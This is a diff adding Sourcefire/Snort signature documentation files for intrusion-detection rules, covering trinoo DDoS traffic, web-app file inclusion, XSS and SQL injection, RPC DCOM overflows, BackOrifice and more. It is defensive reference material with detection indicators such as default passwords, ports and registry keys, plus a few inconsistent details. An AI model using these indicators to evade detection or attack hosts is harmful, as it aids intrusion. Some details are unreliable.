+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/235.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+235
+
+--
+Summary:
+This event is generated when a trinoo DDoS attacker host communicates with a master host.  
+
+--
+Impact:
+Attempted DDoS. If the listed source IP is in your network, it may be a trinoo attacker. If the listed destination IP is in your network, it may be a trinoo master.
+
+--
+Detailed Information:
+The trinoo DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, attackers communicate with masters to direct them to launch attacks.  An attacker may communicate with a master via TCP destination port 27665 with a string of "killme" in the payload.  This string is a default mdie password.
+
+--
+Affected Systems:
+Any trinoo compromised host.
+
+--
+Attack Scenarios:
+A trinoo attacker will communicate with masters to direct them to launch attacks.
+
+--
+Ease of Attack:
+Simple. trinoo code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+SecurityFocus:
+http://www.securityfocus.com/archive/1/37706
+
+CERT:
+http://www.cert.org/incident_notes/IN-99-07.html#trinoo
+
+--
--- /dev/null
+++ b/doc/signatures/100000380.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000380
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_smilies.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_smilies.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000788.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000788
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "FreeWebshop" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "page" parameter in the "search.php" script used by the "FreeWebshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using FreeWebshop
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/930.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+930
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000816.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000816
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PC_CookBook" application running on a webserver. Access to the file "pccookbook.php" using a remote file being passed as the "mosConfig_absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "mosConfig_absolute_path" parameter in the "pccookbook.php" script used by the "PC_CookBook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PC_CookBook
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1281.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1281
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper on a Solaris host.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on what ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker with valuable information about which RPC services are offered and on which ports.
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Original rule modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
--- /dev/null
+++ b/doc/signatures/3198.txt
@@ -0,0 +1,84 @@
+Rule:
+
+--
+Sid:
+3198
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This event indicates that an attempt to exploit this vulnerability via
+the ISystemActivator component has been made.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/2759.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2759
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_snapshot_repgroup
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/467.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+467
+
+--
+Summary:
+This event is generated when an ICMP echo request is made from a host running Nemesis v1.1 software.
+
+--
+Impact:
+Information gathering.  An ICMP echo request can determine if a host is active.
+
+--
+Detailed Information:
+An ICMP echo request is used by the ping command to elicit an ICMP echo reply from a listening live host.  An echo request that originates from a host running Nemesis v1.1 software contains a unique payload in the message request.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+An attacker may attempt to determine live hosts in a network prior to launching an attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+An ICMP echo request may be used to legimately troubleshoot networking problems.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP echo requests.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.org>
+Documented by Steven Alexander<alexander.s@mccd.edu>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS449
+
+--
--- /dev/null
+++ b/doc/signatures/3155.txt
@@ -0,0 +1,92 @@
+Rule:
+
+--
+Sid:
+3155
+
+--
+Summary:
+BackOrifice is a Trojan Horse.
+
+Server Port: 31337 although in later versions this port can be changed
+to a value between 1 and 65535 Protocol: UDP although in later versions
+TCP can also be used
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to. This Trojan
+also has the ability to delete data, steal passwords and disable the
+machine.
+
+--
+Detailed Information:
+The Trojan changes system registry settings to add the BackOrifice sever
+to programs normally started on boot. Due to the nature of this Trojan
+it is unlikely that the attacker's client IP address has been spoofed.
+
+The default name of the server application is UMGR32, which can be
+changed on first use. The new application may be installed in the system
+or system32 direcory and the original may also be deleted.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
+
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
+
+Registry keys added may vary, look for spurious entries in the above
+locations.
+
+BackOrifice may hide the process from viewing inthe Windows task
+manager. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Symantec Security Response
+http://www.symantec.com/avcenter/venc/data/back.orifice2000.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/3408.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3408
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2337.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid: 
+2337
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Tellurian TftpdNT.
+
+--
+Impact:
+Execution of arbitrary code. Possible unauthorised root access.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for an attacker to expoit a buffer overrun condition in
+Tellurian TftpdNT. User supplied filenames are not correctly handled by
+some versions of Tellurian TftpdNT, this may result in an attacker being
+able to cause the overrun condition to occur.
+
+--
+Affected Systems:
+	Tellurian TftpdNT 2.0 and prior
+
+--
+Attack Scenarios:
+An attacker may use a publicly available exploit script to take
+advantage of the vulnerability.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000532.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000532
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "BtitTracker" application running on a webserver. Access 
+to the file "torrents.php" with SQL commands being passed as the "order" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "order" parameter in the "torrents.php" script used by 
+the "BtitTracker" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BtitTracker
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2434.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+2434
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Possible unauthorized administrative access to the server or application.
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+MDaemon is mail server software for Microsoft Windows systems. It uses a
+CGI web interface to send email. The email form used to submit the
+message does not properly check user supplied input. This may result in
+an attacker being able to supply a "From" field larger than 249 bytes
+which may in turn cause an error condition to occur in the executable
+file handling the form input. This error may present the attacker with
+the opportunity to gain administrative access to the server and also
+execute code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.5.2
+	Alt-N MDaemon 6.7.5, 6.7.9
+	Alt-N MDaemon 6.8.0 through 6.8.5
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2550.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2550
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow 
+associated with Winamp's processing of a .XM file module name.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running Winamp.
+
+--
+Detailed Information:
+Winamp is a media file player for Windows developed by Nullsoft.  A buffer
+overflow exists because of insufficient bounds checking while parsing fields
+in a .XM file.  An overly long module name may cause the buffer overflow 
+permitting the execution of arbitrary code at the privilege level of the user 
+running Winamp.
+
+--
+Affected Systems:
+Winamp 2.x, 3.x, and 5.0-5.02
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed .XM tracker name that may cause
+a buffer overflow and the subsequent execution of arbitrary code on the
+vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+
+Other:
+http://www.nextgenss.com/advisories/winampheap.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1550.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1550
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a
+buffer overflow vulnerability in the ETRN command in NetWin DMail.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Some versions of NetWin DMail SMTP server contain a buffer overflow
+vulnerability in the ETRN command. An attacker can use an overly long
+string in an ETRN argument to cause a buffer overflow condition. This
+allows the attacker to crash the mail server or execute arbitrary code
+with root access. 
+
+--
+Affected Systems:
+	NetWin DMail 2.8a-h and prior
+	NetWin DMail 2.7q and prior
+
+--
+Attack Scenarios:
+An attacker sends an ETRN command with an overly long argument to a
+NetWin DMail SMTP server. The attacker can then crash the mail server or
+execute arbitrary code with root access. 
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2181.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid:
+
+2181
+
+--
+Summary:
+This event is generated when a BitTorrent client transfers data with 
+another BitTorrent peer.
+
+--
+Impact:
+
+Possible violation of policy and abuse of network resources.
+
+--
+Detailed Information:
+BitTorrent is a peer-to-peer application used for simultaneous downloads
+of large files.  BitTorrent is designed to allow multiple peers to 
+download large files simultaneously without using extraneous bandwidth 
+from a centralized server.
+
+BitTorrent peers connect to other peers for file transfer.  This rule 
+looks for the BitTorrent protocol header on the default BitTorrent 
+ports.
+
+--
+Attack Scenarios:
+A user downloaded a BitTorrent client and attempts to download files 
+from a BitTorrent network.
+
+--
+Ease of Attack:
+
+Unix, Windows, and MacOS clients are publicly available for BitTorrent.
+
+--
+False Positives:
+
+None Known.
+
+--
+False Negatives:
+
+The protocol name is hard coded in BitTorrent to "BitTorrent Protocol".
+If the protocol name was changed in the clients and tracker, then this
+rule would not generate an event.
+
+The minimum and maximum ports for BitTorrent clients to listen on are 
+hard coded in the clients.  If the minimum and maximum ports were 
+changed in the clients, then this rule would not generate an event.
+
+--
+Corrective Action:
+
+If this is a violation of network policy, take appropriate steps to 
+prevent further violations.
+
+--
+Contributors:
+
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+
+-- 
+Additional References:
+
+Bittorrent Protocol Specification
+http://bitconjurer.org/BitTorrent/protocol.html
+
+Wikipedia
+http://en.wikipedia.org/wiki/BitTorrent
+
+--
--- /dev/null
+++ b/doc/signatures/100000163.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000163
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of 407 Proxy 
+Authentication Required messages are returned by an SIP-enabled host.
+
+--
+Impact:
+This can be an indication of either a brute force authentication attack or a 
+denial of service in progress.
+
+--
+Detailed Information:
+When a user attempts to send an INVITE message with invalid credentials, a SIP 
+server returns a 401 Proxy Authentication Required message. A high volume of 
+these may indicate that an authentication attack, likely brute-force style, or 
+a denial of service is in progress.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to attempt a brute-force authentication attack 
+or a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is easy to write a script to cycle through all possible 
+authentication values or to simply flood a system with unauthorized data.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/2040.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+2040
+
+--
+Summary:
+This event is generated when an attempt is made to login using XTACACS
+from a machine outside the local area network.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to access 
+resources controlled by the XTACACS server.
+
+This may also be an attempt to gain unauthorized access to resources 
+with the credentials of a valid user using brute force methodology.
+
+--
+Detailed Information:
+The Extended Terminal Access Controller Access Control System (XTACACS) 
+is an authentication and authorization protocol derived from  CISCO 
+TACACS. It is used in tcp/ip networks where network servers authenticate
+clients from a master server.
+
+When a user logs in to a server that uses XTACACS the server then makes 
+a request to a master server to detrmine the validity of the request. 
+The master server then verifies the login attempt and returns data 
+concerning that user which may include information regarding resources 
+the user is allowed access to in the form of an access list.
+
+--
+Affected Systems:
+All servers using XTACACS for authentication control.
+
+--
+Attack Scenarios:
+Regular user login method.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+XTACACS servers should only authenticate to known hosts and firewall 
+rules should prevent access to XTACACS enabled servers from outside the 
+local area network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-01.html
+
+Network Information Library - Intel:
+http://www.intel.com/support/si/library/bi0414.htm
+
+The Internet Next Generation Project:
+http://ing.ctit.utwente.nl/WU5/D5.1/Technology/xtacacs/
+
+--
--- /dev/null
+++ b/doc/signatures/3398.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3398
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
